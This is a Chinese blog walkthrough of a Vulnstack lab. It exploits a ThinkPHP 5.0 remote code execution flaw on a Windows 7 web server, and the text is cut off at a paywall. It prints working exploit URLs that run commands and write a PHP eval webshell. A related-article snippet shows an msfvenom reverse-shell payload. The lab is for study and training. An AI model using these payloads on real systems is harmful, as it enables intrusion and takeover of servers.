记一次Vulnstack靶场内网渗透(五)

最新推荐文章于 2024-05-03 14:06:03 发布
最新推荐文章于 2024-05-03 14:06:03 发布
阅读量460 收藏 2
点赞数
文章标签: 网络安全 web安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/text2201/article/details/131917529
版权

20210218183042.png### 实验环境搭建

VMware新建网卡VMnet14,选择仅主机模式,并将网段IP设置为192.168.138.0:

image-20210218185303768

然后将Windows 7和Windows 2008绑在这个VMnet14上。除此之外,还需要给Windows 7
新增一个网卡,并设置为桥接模式。最终Windows 7具有两个网卡,分别连通内外网,而Windows 2008只有一个网卡连接,处于内网无法与外网通信。

整个靶场环境大致如下:

20210218200629.png

Windows 7:

Web服务器(使用的是PHPStudy,记得自己手动开一下)

模拟外网IP:192.168.0.101

内网IP:192.168.138.136

Windows Server 2008:

域控制器

内网IP:192.168.138.138

攻击者VPS:

OS:Kali Linux

IP:192.168.0.100

外网渗透

我们首先对目标机Windows 7(192.168.0.101)进行端口扫:nmap -T4 -sC -sV 192.168.0.101

发现Web服务和Mysql:

20210218194404.png

访问80端口发现是个thinkphp:

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-fRrBdibD-1690267153222)(https://image.3001.net/images/20210218/1613660038_602e7f86bccc07976dca1.png!small)]

版本是ThinkPHP V5.0,既然是V5.0,那么我们就可以尝试一下Thinkphp远程命令执行漏洞。

漏洞描述:由于thinkphp对框架中的核心Requests类的method方法提供了表单请求伪造,该功能利用$_POST['_method']来传递真实的请求方法。但由于框架没有对参数进行验证,导致攻击者可以设置$_POST['_method']='__construct'而让该类的变量被覆盖。攻击者利用该方式将filter变量覆盖为system等函数名,当内部进行参数过滤时便会进行执行任意命令。

报错查看详细版本:

image-20210218195246787

使用kali的searchsploit查找一下漏洞利用POC:searchsploit thinkphp

20210218200703.png

发现最后一个是thinkphp5.X版本的RCE,我们进入该漏洞的文件46150.txt:cd /usr/share/exploitdb/exploits/php/webappscat 46150.txt

20210218195419.png

payload:http://192.168.0.101/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

命令执行成功:

20210218195917.png

写入Webshell:http://192.168.0.101/?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo “<?php @eval($_POST[whoami]);?>” > shell.php

写入成功:

20210218200654.png

连接蚁剑:

最低0.47元/天 解锁文章
AIGC小王
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
php自查无后门靶场源码,渗透测试源码一套
03-22
【PHP自查无后门靶场源码与渗透测试详解】 在网络安全领域,渗透测试是确保网站和应用程序安全性的重要环节。PHP作为广泛应用的服务器端脚本语言,其安全问题备受关注。"php自查无后门靶场源码"是用于安全专业人士...
渗透学习 webug4.0靶场
07-12
渗透学习 webug4.0靶场 渗透学习 webug4.0靶场 渗透学习 webug4.0靶场
复现红日安全-ATT& CK实战:Vulnstack靶场实战(一)
weixin_51152373的博客
06-14 1016
内网实战环境配置所有主机密码为:hongrisec@2019密码同一修改为:hongrisec@2021攻击机名称: win 10 | kali 2020vm1名称: win 7ip: 外网:192.168.154.0内网:192.168.52.143vm2名称: win 2003vm3名称: win 2008(域控)网络配置Win7服务开启。
内网渗透Vulnstack4靶场的全方位打法
xf555er的博客
12-29 1551
MS14-068是一个著名的Windows Kerberos安全漏洞,允许攻击者篡改Kerberos票据,从而获取非法提权。这个漏洞特别影响Windows域控制器,能让攻击者伪造Kerberos票据,获取域内几乎任意账户的权限,包括域管理员权限。这使得攻击者可以在网络中随意访问和控制资源。
2024年网安最全Vulnstack红日安全内网域渗透靶场1实战_vulnstack靶场
最新发布
2401_84252281的博客
05-03 1276
是由红日安全团队倾力打造一个靶场知识平台,靶场环境(CMS、漏洞管理、以及域管理等)全部依据国内企业的业务习惯进行模拟,环境设计思路全部来源 ATT&CK 红队评估设计模式,从环境搭建、漏洞利用、内网搜集、横向移动、构建通道、持久控制、痕迹清理等方式进行搭建靶场和设计题目。为了进一步学习内网渗透,本文将学习并录红日安全团队提供的一个内网域环境靶场的渗透过程。
vulnstack内网靶场渗透测试
three_1996的博客
03-19 666
【代码】vulnstack内网靶场渗透测试。
内网渗透vulnstack第二个靶场
m0_58236911的博客
04-29 467
本文为个人在练习红日安全vulnstack系列的第二个靶场时所写笔,希望对大家能有所帮助,若有疑问,欢迎提出交流,敬请各位批评指正!进入C:\Oracle\Middleware\user_projects\domains\base_domain目录,也可以使用 CobaltStrike自带的提权插件,提权手段很多这里不举例。右击会话—jump—psexec64(PC为32位,需要使用psexec)模拟外网网段:192.168.111.0/24。权限维持有多种途径,这里采用的是黄金票据。
vulnstack系列靶场
aming小老弟
06-09 3037
靶场
WEB渗透学习-upload-labs靶场
04-20
**WEB渗透学习-upload-labs靶场详解** 在网络安全领域,特别是Web渗透测试中,了解和掌握文件上传...无论你是想在网络安全领域发展,还是仅仅对这个话题感兴趣,投入时间在这个靶场上,都将是一次有价值的学习体验。
WEB渗透学习-XSS-labs靶场
04-20
**XSS(跨站脚本攻击)学习指南:XSS-labs靶场详解** XSS,全称为Cross-Site Scripting,是网络安全领域常见的漏洞类型之一。它允许攻击者通过注入恶意脚本到Web页面中,进而对用户浏览器进行操控。XSS-labs是一个...
web渗透教程1:pikachu靶场搭建
11-17
带你手把手搭建pikachu靶场环境
ATT&CK实战系列-红队评估 (红日靶场3)Vulnstack三层网络域渗透靶场
qq_47289634的博客
08-01 1230
靶场地址打开虚拟机镜像为挂起状态,第一时间进行快照,部分服务未做自启,重启后无法自动运行。挂起状态,账号已默认登陆,centos为出网机,第一次运行,需重新获取桥接模式网卡ip。除重新获取ip,不建议进行任何虚拟机操作。参考虚拟机网络配置,添加新的网络,该网络作为内部网络。注:名称及网段必须符合下面图片,进行了固定ip配置。
VulnStack靶场
aming小老弟
04-19 1784
ATT&CK红队评估实战靶场二0x00 靶场搭建防火墙策略运行weblogic启动脚本net view 显示 6118 error0x01 渗透实战 红队实战系列,主要以真实企业环境为实例搭建一系列靶场 本次红队环境 关键词:威胁情报 | 内网渗透 | Kill Chain | 域渗透 | 安全靶场 Bypass UAC Windows系统NTLM获取(理论知识:Windows认证) Access Token利用(MSSQL利用) WMI利用 网页代理,二层代理,特殊协议代理(DNS,I
VulnStack域环境靶场渗透(一)
qq_43590351的博客
09-20 1371
红日靶场一 msfvenom -p windows/meterpreter_reverse_tcp LHOST=192.168.31.229 LPORT=4444 -f exe -o msf1.exe 实验环境 web服务器 192.168.31.79192.168.52.143 域成员server2003 192.168.52.141 域控server2008 192.168.52.138 物理机 192.168.31.238 kali-vps 192.168.31.229
VulnStack靶场6
weixin_45568454的博客
11-04 252
打靶日VulnStack下了好多踩过的坑 以及一些小的心得体会
Thinkphp5 5.0.22/5.1.29远程代码执行漏洞+webshell工具连接(复现详细过程)
m0_52701599的博客
03-19 2815
Thinkphp5 5.0.22/5.1.29远程代码执行漏洞
红日靶场(vulnstack)一 超全面详细的渗透测试学习笔
热门推荐
qq_41821603的博客
11-24 5万+
这里写目录标题一、环境搭建二、拿下web服务器2.1 信息收集 一、环境搭建 实验环境拓扑如下: windows2008 域控 (host-only) windiws 7 web服务器 (双网卡 host-only + NAT) windows 2003 域内PC (host-only) 二、拿下web服务器 2.1 信息收集 ...
CFS三层靶机搭建及其内网渗透
..
07-05 6406
CFS三层靶机搭建及其内网渗透,附靶场环境
vulnstack1--红队靶机
qq_46527080的博客
01-15 3618
文章目录一、环境搭建一、前渗透的阶段首先信息收集getshell尝试内网信息收集二、后渗透阶段(一)msf和cs联动内网信息收集三、攻击域(内网渗透)(一)提权(二)横向移动攻击域控 一、环境搭建 搭建靶机环境是(要求这几个内网互ping要通) 一台链接外网的域成员网站机 win 7+phpstudy 一台域控主服务器 win server 08 一台域控成员 server 03 win 7 有两个网卡(win7中的phpstudy也得开启) 一个仅主机(必须和其他两个域控都选择第一个网卡为仅主.
红日靶场VulnStack1
10-08
对于红日靶场VulnStack1,我了解到它是一个虚拟机中的漏洞靶场。这个靶场主要用于学习和实践网络安全方面的知识,其中包含了一些常见的漏洞,供用户进行渗透测试和漏洞攻击的实战练习。 由于我是一个AI模型,并没有...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值